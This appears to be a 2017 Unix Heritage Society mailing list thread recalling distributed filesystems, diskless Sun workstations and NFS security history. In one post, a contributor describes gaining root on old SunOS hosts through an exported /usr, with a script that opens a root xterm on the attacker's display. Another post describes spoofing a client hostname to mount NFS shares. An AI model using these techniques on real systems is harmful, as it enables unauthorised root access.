The Unix Heritage Society mailing list
 help / color / mirror / Atom feed
* [TUHS] RFS was: Re: UNIX of choice these days?
@ 2017-09-28 12:53 Noel Chiappa
  2017-09-28 14:09 ` Theodore Ts'o
  0 siblings, 1 reply; 48+ messages in thread
From: Noel Chiappa @ 2017-09-28 12:53 UTC (permalink / raw)


    > From: Theodore Ts'o

    > when a file was truncated and then rewritten, and "truncate this file"
    > packet got reordered and got received after the "here's the new 4k of
    > contents of the file", Hilar[i]ty Enused.

This sounds _exactly_ like a bad bug found in the RVD protocol (Remote Virtual
Disk - a simple block device emulator). Disks kept suffering bit rot (damage
to the inodes, IIRC). After much suffering, and pain trying to debug it (lots
of disk writes, how do you figure out the one that's the problem), it was
finally found (IIRC, it wasn't something thinking about it, they actually
caught it). Turned out (I'm pretty sure my memory of the bug is correct), if
you had two writes of the same block in quick sucession, and the second was
lost, if the first one's ack was delayed Just Enough...

They had an unused 'hint' (I think) field in the protocol, and so they
recycled that to be a sequence number, so they could tell ack's apart.

      Noel



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 12:53 [TUHS] RFS was: Re: UNIX of choice these days? Noel Chiappa
@ 2017-09-28 14:09 ` Theodore Ts'o
  2017-09-28 14:35   ` Clem Cole
  0 siblings, 1 reply; 48+ messages in thread
From: Theodore Ts'o @ 2017-09-28 14:09 UTC (permalink / raw)


On Thu, Sep 28, 2017 at 08:53:54AM -0400, Noel Chiappa wrote:
>     > From: Theodore Ts'o
> 
>     > when a file was truncated and then rewritten, and "truncate this file"
>     > packet got reordered and got received after the "here's the new 4k of
>     > contents of the file", Hilar[i]ty Enused.
> 
> This sounds _exactly_ like a bad bug found in the RVD protocol (Remote Virtual
> Disk - a simple block device emulator). Disks kept suffering bit rot (damage
> to the inodes, IIRC). After much suffering, and pain trying to debug it (lots
> of disk writes, how do you figure out the one that's the problem), it was
> finally found (IIRC, it wasn't something thinking about it, they actually
> caught it). Turned out (I'm pretty sure my memory of the bug is correct), if
> you had two writes of the same block in quick sucession, and the second was
> lost, if the first one's ack was delayed Just Enough...

At least at Project Athena, we only used RVD as a way to do read-only
dissemination of system software, since RVD couldn't provide any kind
of file sharing, which was important at Athena.  So we used NFS
initially, and later on, transitioned to the Andrew File System (AFS).

The fact that with AFS you could do live migration of a user's home
directory, in the middle of day, to replace a drive that was making
early signs of failure --- was such that all of our ops people
infinitely preferred AFS to NFS.  NFS meant coming in late at night,
after scheduling downtime, to replace a failing disk, where as with
AFS, aside from a 30 second hiccup when the AFS volume was swept from
one server to another, was such that AFS was referred to as "crack
cocaine".  One ops people had a sniff of AFS, they never wanted to go
back to NFS.

						- Ted



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 14:09 ` Theodore Ts'o
@ 2017-09-28 14:35   ` Clem Cole
  0 siblings, 0 replies; 48+ messages in thread
From: Clem Cole @ 2017-09-28 14:35 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 711 bytes --]

On Thu, Sep 28, 2017 at 10:09 AM, Theodore Ts'o <tytso at mit.edu> wrote:

> One ops people had a sniff of AFS, they never wanted to go
> ​ ​
> back to NFS.
>
​Amen... and once you switched to a token manager or dlm under the covers
to do the locking, you never could understand why wouldn't do it properly.​

Although the brilliance of NFS was its easy of getting out there getting
people addicted to using a distributed FS.  That was what Sun nailed.

And just like communism had to add 'work incentives' -- NFS added state :-)

Clem
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170928/9b91eafe/attachment.html>


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 22:11                                       ` Don Hopkins
@ 2017-09-29 22:21                                         ` Don Hopkins
  0 siblings, 0 replies; 48+ messages in thread
From: Don Hopkins @ 2017-09-29 22:21 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 5315 bytes --]

There were some interesting followup from Milo Medin, Jordan Hubbard and from Dennis Perry on the h_g/tcp-ip mailing lists:

From: Milo S. Medin <medin@orion.arpa>

Actually, Dennis Perry is the head of DARPA/IPTO, not a pencil pusher
in the IG's office.  IPTO is the part of DARPA that deals with all
CS issues (including funding for ARPANET, BSD, MACH, SDINET, etc...).
Calling him part of the IG's office on the TCP/IP list probably didn't
win you any favors.  Coincidentally I was at a meeting at the Pentagon
last Thursday that Dennis was at, along with Mike Corrigan (the man
at DoD/OSD responsible for all of DDN), and a couple other such types
discussing Internet management issues, when your little incident
came up.  Dennis was absolutely livid, and I recall him saying something
about shutting off UCB's PSN ports if this happened again.  There were
also reports about the DCA management types really putting on the heat
about turning on Mailbridge filtering now and not after the buttergates
are deployed.  I don't know if Mike St. Johns and company can hold them
off much longer.  Sigh...  Mike Corrigan mentioned that this was the sort
of thing that gets networks shut off.  You really pissed off the wrong
people with this move!

Dennis also called up some VP at SUN and demanded this hole
be patched in the next release.  People generally pay attention
to such people.

From: Jordan K. Hubbard <jkh@violet.berkeley.edu>

Well, I hope Sun patches the holes, Milo. I'm sorry that certain people chose
to react as strongly as they did in our esteemed government offices, but
I am glad that it raised enough fuss to possibly get the problem fixed. No
data was destroyed, lost, or infiltrated, but some people got a whack on the
side of the head for leaving the back door open. I'm not sure I can say that
I'm all that sorry that this happened. rwall is certainly going to change on
my machines, I can only hope that people concerned about being rwall'd over
the net will tighten up their RPC. Those that don't care, should at least be
aware of it.


From: Dennis G. Perry <PERRY@vax.darpa.mil>

Jordan, you are right in your assumptions that people will get annoyed
that what happened was allowed to happen.

By the way, I am the program manager of the Arpanet in the Information
Science and Technology Office of DARPA, located in Roslin (Arlington), not
the Pentagon.

I would like suggestions as to what you, or anyone else, think should be
done to prevent such occurances in the furture.  There are many drastic
choices one could make.  Is there a reasonable one?  Perhaps some one
from Sun could volunteer what there action will be in light of this
revelation.  I certainly hope that the community can come up with a good
solution, because I know that when the problem gets solved from the top
the solutions will reflect their concerns.

Think about this situation and I think you will all agree that this is
 a serious problem that could cripple the Arpanet and anyother net that
lets things like this happen without control.

dennis
———

From: Jordan K. Hubbard <jkh@violet.berkeley.edu>

Dennis,

Sorry about the mixup on your location and position within DARPA. I got
the news of your call to Richard Olson second hand, and I guess details
got muddled along the way. I think the best solution to this problem (and
other problems of this nature) is to tighten up the receiving ends. Assuming
that the network is basically hostile seems safer than assuming that it's
benign when deciding which services to offer.

I don't know what Sun has in mind for Secure RPC, or whether they will move
the release date for 4.0 (which presumably incorporates these features)
closer, but I will be changing rwalld here at Berkeley to use a new YP
database containing a list of "trusted" hosts. If it's possible to change
RPC itself, without massive performance degradation, I may do that as well.

My primary concern is that people understand where and why unix/network
security holes exist. I've gotten a few messages from people saying that
they would consider it a bug if rwall *didn't* perform in this manner, and
that hampering their ability to communicate with the rest of the network
would be against the spirit of all it stands for. There is, of course, the
opposite camp which feels that IMP's should only forward packets from hosts
registered with the NIC. I think that either point of view has its pros and
cons, but that it should be up to the users to make a choice. If they wish
to expose themselves to potential annoyance in exchange for being able to,
uh, communicate more freely, then so be it. If the opposite is true, then
they can take appropriate action. At least an informed choice will have been
made.

                Yours for a secure, but usable, network.

From: Dennis G. Perry <PERRY@vax.darpa.mil>

Jordan, thanks for the note.  I agree that we should discover and FIX holes
found in the system.  But at the same time, we don't want to have to
shut the thing down until such a fix can be made. Misuse of the system
get us all in a lot of trouble.  The Arpanet has succeeded because of
the self policing community. If this type of potential for disruption
gets used by very many people, I guarentee that we all will not like the
solution or fix proposed.

dennis
———




^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 21:24                                     ` Arthur Krewat
@ 2017-09-29 22:11                                       ` Don Hopkins
  2017-09-29 22:21                                         ` Don Hopkins
  0 siblings, 1 reply; 48+ messages in thread
From: Don Hopkins @ 2017-09-29 22:11 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 885 bytes --]

Sun’s YP was a piece of work. 

That name always sounded to me like a brand of moist pop-up baby bottom wipes. 

Baby made a poopie, and now we need a YP!

Who remember’s Jordan Hubbard’s notorious rwall incident? 

https://en.wikipedia.org/wiki/Jordan_Hubbard#rwall_incident <https://en.wikipedia.org/wiki/Jordan_Hubbard#rwall_incident>

http://catless.ncl.ac.uk/Risks/4.73.html#subj10.1 <http://catless.ncl.ac.uk/Risks/4.73.html#subj10.1>

He put this line into /etc/netgroup:

universal (,,)

Then he did an rwall to that group…

I on a Sun at umd at the time, and received a copy! 

It also scribbled all over Dennis Perry's Interleaf windows (the Inspector General of the ARPAnet in the Pentagon).

-Don

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170930/fb269730/attachment.html>


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 18:40                                   ` Don Hopkins
  2017-09-29 19:03                                     ` Larry McVoy
@ 2017-09-29 21:24                                     ` Arthur Krewat
  2017-09-29 22:11                                       ` Don Hopkins
  1 sibling, 1 reply; 48+ messages in thread
From: Arthur Krewat @ 2017-09-29 21:24 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 1086 bytes --]

There was also a horrible bit of backdoor-ism that was exploitable with 
NFS on SunOS - and was there for at least 4.1.3 but I imagine it was 
around for a long time.

If the /usr filesystem was exported, and you were either a "known host" 
or it was exported to (everyone) (and yes, there were a LOT of people 
that did this)...

Mount it locally, become root, su - uucp, and go and change the mode on 
/usr/lib/uucp/uucico (which was owned by uucp) from setuid to writable. 
Overwrite with your binary or script of choice.

Telnet to the exploited host, and /usr/lib/uucp/uucico was executed as root.

I usually used:

#!/bin/sh
/usr/openwin/bin/xterm -display <myhost>:0

I used this on a WAN back in the 90's - actually to reset a lost root 
password for someone, but also to poke around sometimes ;)

I don't know why people exported /usr - but they did it a lot.

On 9/29/2017 2:40 PM, Don Hopkins wrote:
> I was able to nfs-mount a directory on one of cs.cmu.edu's servers from sun.com’s network with no problem. Ron may remember me warning him about that!
>   
> -Don
>
>
>



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 19:19                                 ` Dan Cross
  2017-09-29 19:22                                   ` Larry McVoy
@ 2017-09-29 20:52                                   ` Jon Forrest
  1 sibling, 0 replies; 48+ messages in thread
From: Jon Forrest @ 2017-09-29 20:52 UTC (permalink / raw)




On 9/29/2017 12:19 PM, Dan Cross wrote:

> We had a setup on Sun's running SunOS 4.1.x that I actually really
> liked; I believe it was referred to as "dataless".
[...]
> It was a really nice, comfortable system. Of course, it wouldn't fly
> in this day and age for security and other reasons but back in the
> early 90s it was great.

I agree 100%. I created such an environment on DEC's OSF/1 running
on Alphas (c. f. A Dataless Environment in OSF/1, Digital Systems
Journal - Nov. 1994) when I worked in the CS department at
UC Berkeley. Plus, the CS department itself ran a big Auspex
server that made it possible to create an ad-hoc dataless environment.

At the time, a 600MB disk drive was considered large. Putting all
the read-only stuff on a server made lots of sense. Of course, it
required a reasonably fast network connection, but with 100Mbs networks
starting to get cheap at that time, that wasn't a big deal.

Jon Forrest
UC Berkeley (ret.)


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 19:19                                 ` Dan Cross
@ 2017-09-29 19:22                                   ` Larry McVoy
  2017-09-29 20:52                                   ` Jon Forrest
  1 sibling, 0 replies; 48+ messages in thread
From: Larry McVoy @ 2017-09-29 19:22 UTC (permalink / raw)


On Fri, Sep 29, 2017 at 03:19:19PM -0400, Dan Cross wrote:
> On Thu, Sep 28, 2017 at 6:20 PM, Larry McVoy <lm at mcvoy.com> wrote:
> > I dunno why all the hating on diskless.  They actually work, I used the
> > heck out of them.  For kernel work, stacking one on top of the other,
> > the test machine being diskless, was a cheap way to get a setup.
> >
> > Sure, disk was better and if your work load was write heavy then they
> > sucked (*), but for testing, for editing, that sort of thing, they were
> > fine.
> 
> We had a setup on Sun's running SunOS 4.1.x that I actually really
> liked; I believe it was referred to as "dataless". The root
> filesystem, /tmp and swap were local, along with scratch space on an
> arbitrarily named filesystem (I think we mounted that on /scratch, but
> I can't remember the details at this point). The difference between
> /tmp and /scratch was that the latter persisted across reboots and we
> backed it up. /usr, /usr/local came from a fileserver on the local
> ethernet and /home was automounted. Users didn't have local root
> access, and we kept / pretty well updated using rdist and some
> home-grown scripts; basically, we could throw / away at any time on
> any machine and rebuild it without losing much. 

That's how Sun ran their engineering setup by default.  Your home 
directory was on some file server and that's where you put long 
lived stuff or stuff you wanted other people to see.

The local disks were for performance and were optional.  You could do
the same thing diskless for an admin and they were perfectly happy.

I did more or less the same thing for 20 years at BitMover, worked
great.


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 22:20                               ` Larry McVoy
                                                   ` (2 preceding siblings ...)
  2017-09-29 15:22                                 ` George Ross
@ 2017-09-29 19:19                                 ` Dan Cross
  2017-09-29 19:22                                   ` Larry McVoy
  2017-09-29 20:52                                   ` Jon Forrest
  3 siblings, 2 replies; 48+ messages in thread
From: Dan Cross @ 2017-09-29 19:19 UTC (permalink / raw)


On Thu, Sep 28, 2017 at 6:20 PM, Larry McVoy <lm at mcvoy.com> wrote:
> I dunno why all the hating on diskless.  They actually work, I used the
> heck out of them.  For kernel work, stacking one on top of the other,
> the test machine being diskless, was a cheap way to get a setup.
>
> Sure, disk was better and if your work load was write heavy then they
> sucked (*), but for testing, for editing, that sort of thing, they were
> fine.

We had a setup on Sun's running SunOS 4.1.x that I actually really
liked; I believe it was referred to as "dataless". The root
filesystem, /tmp and swap were local, along with scratch space on an
arbitrarily named filesystem (I think we mounted that on /scratch, but
I can't remember the details at this point). The difference between
/tmp and /scratch was that the latter persisted across reboots and we
backed it up. /usr, /usr/local came from a fileserver on the local
ethernet and /home was automounted. Users didn't have local root
access, and we kept / pretty well updated using rdist and some
home-grown scripts; basically, we could throw / away at any time on
any machine and rebuild it without losing much. Since all the
administrative data like passwd, group et al all came from NIS it was
almost the best of both worlds: the consistency and central management
of diskless machines and the performance of having local disk. When
the user wanted to do something temporary and IO intensive s/he just
did it in /scratch or /tmp; everything else lived on the file server.

We could deploy a new machine by netbooting it and dd'ing an image
onto the disk. A script ran the first time it booted up that made
whatever small modifications were necessary to files in /etc (this was
before jumpstart and officially sanctioned network install systems)
and away one went. It took about 10 minutes before the user could take
over and get to work.

It was a really nice, comfortable system. Of course, it wouldn't fly
in this day and age for security and other reasons but back in the
early 90s it was great. I didn't find a system I liked as much until I
met plan9. In many ways, the environments were on these days feel like
a regression.

        - Dan C.


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 18:40                                   ` Don Hopkins
@ 2017-09-29 19:03                                     ` Larry McVoy
  2017-09-29 21:24                                     ` Arthur Krewat
  1 sibling, 0 replies; 48+ messages in thread
From: Larry McVoy @ 2017-09-29 19:03 UTC (permalink / raw)


On Fri, Sep 29, 2017 at 08:40:41PM +0200, Don Hopkins wrote:
> On 29 Sep 2017, at 17:22, George Ross <gdmr at inf.ed.ac.uk> wrote:
> 
> > I dunno why all the hating on diskless.  They actually work, I used the
> > heck out of them.
> 
> The issue we (initially) had with Suns wasn't the stateful/stateless debate,
> or indeed that they were discless.  It was that horrible "UNIX
> authentication" that NFS used.

Yeah, that was a joke (in poor taste at that).


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 16:46                                   ` Grant Taylor
  2017-09-29 17:02                                     ` Kurt H Maier
@ 2017-09-29 18:47                                     ` Andreas Kusalananda Kähäri
  1 sibling, 0 replies; 48+ messages in thread
From: Andreas Kusalananda Kähäri @ 2017-09-29 18:47 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 1279 bytes --]

On Fri, Sep 29, 2017 at 10:46:16AM -0600, Grant Taylor wrote:
> On 09/29/2017 02:59 AM, Andreas Kusalananda Kähäri wrote:
> > My main work setup today is actually a diskless (X11-less) OpenBSD
> > system.  It's just something I set up in a VM environment to learn how
> > to do it (I'm on a work laptop running Windows 10, as I need Windows for
> > some few work-related tasks), but it works just fine and I have no
> > reason to change it.  For one thing, it makes backups easier as they can
> > run locally on the server.
> 
> I think you're the first person that I've seen say "I am" and not "I used
> to" regarding diskless.
> 
> Can I ask for a high level overview of your config?
> 
> I am guessing dhcp and / or bootp, combined with tftp for kernel image, and
> NFS for root.

Nothing fancy.  OpenBSD's dhcpd on a server tells the client to pick up
pxeboot (2nd stage bootstrap) tftp from my file server. pxeboot then
loads the kernel over tftp.  The bootparamd daemon on the fileserver
provides info to the client regarding its root directory and swap file,
and the client mounts these over NFS.

It follows http://man.openbsd.org/diskless closely.



-- 
Andreas Kusalananda Kähäri,
National Bioinformatics Infrastructure Sweden (NBIS),
Uppsala University, Sweden.


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 15:22                                 ` George Ross
@ 2017-09-29 18:40                                   ` Don Hopkins
  2017-09-29 19:03                                     ` Larry McVoy
  2017-09-29 21:24                                     ` Arthur Krewat
  0 siblings, 2 replies; 48+ messages in thread
From: Don Hopkins @ 2017-09-29 18:40 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 1292 bytes --]

On 29 Sep 2017, at 17:22, George Ross <gdmr at inf.ed.ac.uk> wrote:

> I dunno why all the hating on diskless.  They actually work, I used the
> heck out of them.

The issue we (initially) had with Suns wasn't the stateful/stateless debate,
or indeed that they were discless.  It was that horrible "UNIX
authentication" that NFS used.

When I was a summer intern at Sun in ’87, it was common knowledge among the staff that anyone could find out what hosts an NFS file server trusted by using tftp, which was installed by default, and anonymously grabbing /etc/exports (or guessing hostnames if you can’t get the definitive list). 

Then you just go “hostname trusted-hostname ; mount -t nfs sever:/dir ; hostname original-hostname” to mount that file system.

That’s right: the NFS server TRUSTED the NFS client to tell it what it felt like its hostname should be at that particular instant in time!!! If the name the client sent in the parameter to the mount rpc call was listed in /etc/exports, then the server returned a file handle to the client for it to use from then on, even after changing its hostname back! 

I was able to nfs-mount a directory on one of cs.cmu.edu's servers from sun.com’s network with no problem. Ron may remember me warning him about that! 
 
-Don



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 17:02                                     ` Kurt H Maier
  2017-09-29 17:27                                       ` Pete Wright
@ 2017-09-29 18:11                                       ` Grant Taylor
  1 sibling, 0 replies; 48+ messages in thread
From: Grant Taylor @ 2017-09-29 18:11 UTC (permalink / raw)


On 09/29/2017 11:02 AM, Kurt H Maier wrote:
> I run linux workstations and a few supercomputers by PXE booting via 
> DHCP, serving a kernel and initrd over tftp, then having init download a 
> rootfs tarball, which gets extracted to a ramdisk.  switch_root(8) makes 
> it easy.  xCAT automates it.

Thank you for the high level overview.

I'll go do my homework.



-- 
Grant. . . .
unix || die

-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/pkcs7-signature
Size: 3717 bytes
Desc: S/MIME Cryptographic Signature
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170929/771531d7/attachment.bin>


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 17:02                                     ` Kurt H Maier
@ 2017-09-29 17:27                                       ` Pete Wright
  2017-09-29 18:11                                       ` Grant Taylor
  1 sibling, 0 replies; 48+ messages in thread
From: Pete Wright @ 2017-09-29 17:27 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 1155 bytes --]



On 09/29/2017 10:02, Kurt H Maier wrote:
> On Fri, Sep 29, 2017 at 10:46:16AM -0600, Grant Taylor wrote:
>> I am guessing dhcp and / or bootp, combined with tftp for kernel
>> image, and NFS for root.
>            
> I run linux workstations and a few supercomputers by PXE booting via
> DHCP, serving a kernel and initrd over tftp, then having init download a
> rootfs tarball, which gets extracted to a ramdisk.  switch_root(8) makes
> it easy.  xCAT automates it.

I had a similar setup at a large special effects studio I used to work at.

We were trying solve NFSv3 contention issues - especially with large 
directory tree's creating tons of metadata requests on Linux (issue with 
client side caching IIRC) so we experimented with using UnionFS to allow 
for writes to pass-through to local disk.  It was mostly intermediary 
data and initial testing was promising, in that it alleviated the load 
on our filers and seemed to speed up some rendering processes.

I had left before it made it to wide deployment - but it is something 
I've kept in my toolbox since then as an option.

-pete

-- 
Pete Wright
pete at nomadlogic.org
@nomadlogicLA



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 16:46                                   ` Grant Taylor
@ 2017-09-29 17:02                                     ` Kurt H Maier
  2017-09-29 17:27                                       ` Pete Wright
  2017-09-29 18:11                                       ` Grant Taylor
  2017-09-29 18:47                                     ` Andreas Kusalananda Kähäri
  1 sibling, 2 replies; 48+ messages in thread
From: Kurt H Maier @ 2017-09-29 17:02 UTC (permalink / raw)


On Fri, Sep 29, 2017 at 10:46:16AM -0600, Grant Taylor wrote:
>
> I am guessing dhcp and / or bootp, combined with tftp for kernel
> image, and NFS for root.
          
I run linux workstations and a few supercomputers by PXE booting via    
DHCP, serving a kernel and initrd over tftp, then having init download a
rootfs tarball, which gets extracted to a ramdisk.  switch_root(8) makes
it easy.  xCAT automates it.

       
khm



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29  8:59                                 ` Andreas Kusalananda Kähäri
  2017-09-29 14:20                                   ` Clem Cole
@ 2017-09-29 16:46                                   ` Grant Taylor
  2017-09-29 17:02                                     ` Kurt H Maier
  2017-09-29 18:47                                     ` Andreas Kusalananda Kähäri
  1 sibling, 2 replies; 48+ messages in thread
From: Grant Taylor @ 2017-09-29 16:46 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 1266 bytes --]

On 09/29/2017 02:59 AM, Andreas Kusalananda Kähäri wrote:
> My main work setup today is actually a diskless (X11-less) OpenBSD 
> system.  It's just something I set up in a VM environment to learn how 
> to do it (I'm on a work laptop running Windows 10, as I need Windows 
> for some few work-related tasks), but it works just fine and I have no 
> reason to change it.  For one thing, it makes backups easier as they can 
> run locally on the server.

I think you're the first person that I've seen say "I am" and not "I 
used to" regarding diskless.

Can I ask for a high level overview of your config?

I am guessing dhcp and / or bootp, combined with tftp for kernel image, 
and NFS for root.

> OpenBSD has this "dpb" thing ("distributed ports builder", 
> /usr/ports/infrastructure/bin/dpb, http://man.openbsd.org/dpb) that 
> does distributed building of 3rd-party packages.  It does exactly this, 
> sharing the sources over NFS.

Interesting.



-- 
Grant. . . .
unix || die

-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/pkcs7-signature
Size: 3717 bytes
Desc: S/MIME Cryptographic Signature
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170929/94585e4e/attachment-0001.bin>


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 22:20                               ` Larry McVoy
  2017-09-29  2:23                                 ` Kevin Bowling
  2017-09-29  8:59                                 ` Andreas Kusalananda Kähäri
@ 2017-09-29 15:22                                 ` George Ross
  2017-09-29 18:40                                   ` Don Hopkins
  2017-09-29 19:19                                 ` Dan Cross
  3 siblings, 1 reply; 48+ messages in thread
From: George Ross @ 2017-09-29 15:22 UTC (permalink / raw)


> I dunno why all the hating on diskless.  They actually work, I used the
> heck out of them.

The issue we (initially) had with Suns wasn't the stateful/stateless debate,
or indeed that they were discless.  It was that horrible "UNIX
authentication" that NFS used.

We had been using discless "workstations" and fileservers since around the
late '70s / early '80s, basically ever since we discovered that virtual
DECtapes were a whole lot faster than the real thing.  Our "filestores"
didn't trust their clients -- they did the authentication themselves -- so
we could let the students loose doing bare-metal practicals without having
to worry about them breaking in.  That model didn't work for us with NFS.

However, Sun were keen to sell us kit (and DEC didn't seem to be), and they 
could sell us things for less than we could build them ourselves, so we 
eventually ended up with a couple of hundred or so of the things.  And they 
swapped like mad and thrashed the network into the ground.

We split subnets, and split subnets (and had some interesting amd maps as a 
result of trying to keep traffic local) and eventually ended up with so 
many that we couldn't run them all through all the offices as the cable 
bundle was too big, which was a nightmare for the admin staff trying to 
allocate people to desks.  Twisted pair, and then switches, saved us from 
that problem!

(We also had an X-terminal lab for a while, with a couple of beefy Suns as 
CPU servers.  That had its own, different, contention issues.  We learned 
from that not to arrange things in neat blocks, as the students would come 
in after lectures and go for the first free machine nearest the door, so 
using the naive approach we could end up with one CPU server being totally
overloaded and the other practically idle.)

Now everything is a PC with a ginormous disc, and the contention has moved 
to CPU cores and GPUs.  The more you throw at it the more the academics 
will come up with some way to saturate the thing...

(<http://history.dcs.ed.ac.uk/archive/os/APM-filestore/FS.1976/> for my 
rewrite of the original Interdata filestore code, btw, and 
<http://history.dcs.ed.ac.uk/archive/docs/dcs-inf-network-history.pdf> for 
a bit more on our network history.  There was also a filestore version that
ran on VMS and served files from that out to the network, but I haven't
been able to get a copy of that back off tape yet.)
-- 
George D M Ross MSc PhD CEng MBCS CITP
University of Edinburgh, School of Informatics,
Appleton Tower, 11 Crichton Street, Edinburgh, Scotland, EH8 9LE
Mail: gdmr at inf.ed.ac.uk   Voice: 0131 650 5147 
PGP: 1024D/AD758CC5  B91E D430 1E0D 5883 EF6A  426C B676 5C2B AD75 8CC5

The University of Edinburgh is a charitable body, registered in
Scotland, with registration number SC005336.




^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29  8:59                                 ` Andreas Kusalananda Kähäri
@ 2017-09-29 14:20                                   ` Clem Cole
  2017-09-29 16:46                                   ` Grant Taylor
  1 sibling, 0 replies; 48+ messages in thread
From: Clem Cole @ 2017-09-29 14:20 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 2661 bytes --]

On Fri, Sep 29, 2017 at 4:59 AM, Andreas Kusalananda Kähäri <
andreas.kahari at icm.uu.se> wrote:
>
> My main work setup today is actually a diskless (X11-less) OpenBSD
> ​ ​
> system.


​Please be careful when you compare a technology choice of today with
yesterday.​

What Larry and I were arguing about diskless was based on the Masscomp
WS-500 vs Sun-3 vs Apollo system of the same vintage.   Pricing on the 3
systems (with a disk) and the same amount of memory (all three used the
same 16Mhz 68020 processor)  was $9.5K for the WS-500, $10K for the Apollo
and $11.5K for the Sun.   But if you dropped the disk out the system, the
Sun's dropped to $7K and the Apollo's $6.5K (Masscomp could not because I
refused to build it as I thought it was crappy idea for a real time system).

FYI:  Sun charged another $5K for an add-in disk unit, although on
the aftermarket you could get one that worked fine for about $4K [which is
what we did to all the Stellar development systems when we discovered that
they did not work as well as we had thought].

IIRC the memory was 4M (it might have been a little more, but not too
much).    The disk itself was on the order of 100M in size and was ST-506
based on, with an ST-506 to SCSI converter.   I'm trying to remember when
the 200-500M 5.25in ST-506 disk showed up but I think it was a little after
that.

The point is the cost of the HW and configuration of the HW for all intents
and purposes was the same between the three systems.
The difference really was the software.    Each had made different
choices... given their chosen markets.

Today, the HW  allows different choices.  Memory configurations alone, make
diskless much more interesting.   Ignoring a local cache, if you a RAM file
system on a system like what I just described, it took up 1/4 of the memory
you had.

Today, Linux and *BSD use 'ramFS' just to boot the OS - which makes perfect
sense, *today*.

On the other hand, back in the day, on the Masscomp, we turned the cache
off and 'borrowed it' as scratch pad RAM for the boot process (UNIX turned
it on as part of turning on the MMU) because memory was such a premium and
it might not be working.    *Diskless was cost choice in the old days. *
Today the price of the disk (SSD) (i.e. price/bit is so small) the 'cost'
has more to do with power and space in the case and possibly portability
than the price of the bits themselves.   In theory a 'Chromebook' style
system of today needs to permanent local storage.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://minnie.tuhs.org/pipermail/tuhs/attachments/20170929/c61fef18/attachment.html>


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 22:20                               ` Larry McVoy
  2017-09-29  2:23                                 ` Kevin Bowling
@ 2017-09-29  8:59                                 ` Andreas Kusalananda Kähäri
  2017-09-29 14:20                                   ` Clem Cole
  2017-09-29 16:46                                   ` Grant Taylor
  2017-09-29 15:22                                 ` George Ross
  2017-09-29 19:19                                 ` Dan Cross
  3 siblings, 2 replies; 48+ messages in thread
From: Andreas Kusalananda Kähäri @ 2017-09-29  8:59 UTC (permalink / raw)


[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1: Type: text/plain, Size: 2478 bytes --]

On Thu, Sep 28, 2017 at 03:20:56PM -0700, Larry McVoy wrote:
> On Fri, Sep 29, 2017 at 08:08:16AM +1000, Dave Horsfall wrote:
> > On Thu, 28 Sep 2017, Clem Cole wrote:
> > 
> > >Truth is that an Sun-3 running 'diskless' != as an Apollo running
> > >'twinned.' [There is a famous Clem' story I'll not repeat here from
> > >Masscomp about a typo I made, but your imagination would probably be right
